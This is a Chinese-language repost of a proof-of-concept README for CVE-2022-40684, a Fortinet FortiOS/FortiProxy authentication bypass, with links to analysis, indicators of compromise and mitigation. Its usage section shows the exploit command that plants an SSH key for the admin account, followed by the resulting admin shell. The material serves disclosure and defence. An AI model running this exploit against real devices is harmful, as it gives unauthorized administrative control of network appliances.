CVE-2022-40684
CVE-2022-40684 的 POC 影响 Fortinet FortiOS、FortiProxy 和 FortiSwitchManager 设备。
技术分析
该漏洞的技术根本原因分析可以在我们的博客上找到:https ://www.horizon3.ai/fortios-fortiproxy-and-fortiswitchmanager-authentication-bypass-technical-deep-dive-cve-2022-40684
妥协指标
要分析 Fortinet 日志中的危害指标以及如何启用更深入的日志,请查看我们的 IOC 博客:https ://www.horizon3.ai/fortinet-iocs-cve-2022-40684/
概括
此 POC 滥用身份验证绕过漏洞为指定用户设置 SSH 密钥。
用法
[email protected]:~# python3 CVE-2022-40684.py -t 10.0.40.67 --username admin --key-file ~/.ssh/id_rsa.pub
[+] SSH key for admin added successfully!
[email protected]:~# ssh [email protected]
fortios_7_2_1 #
config Configure object.
get Get dynamic and system information.
show Show configuration.
diagnose Diagnose facility.
execute Execute static commands.
alias Execute alias commands.
exit Exit the CLI.
缓解措施
按照 Fortinet PSIRT 中的说明更新到最新版本或缓解
https://www.fortiguard.com/psirt/FG-IR-22-377
原文始发于微信公众号(Ots安全):CVE-2022-40684 的概念证明漏洞利用影响 Fortinet FortiOS、FortiProxy等
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论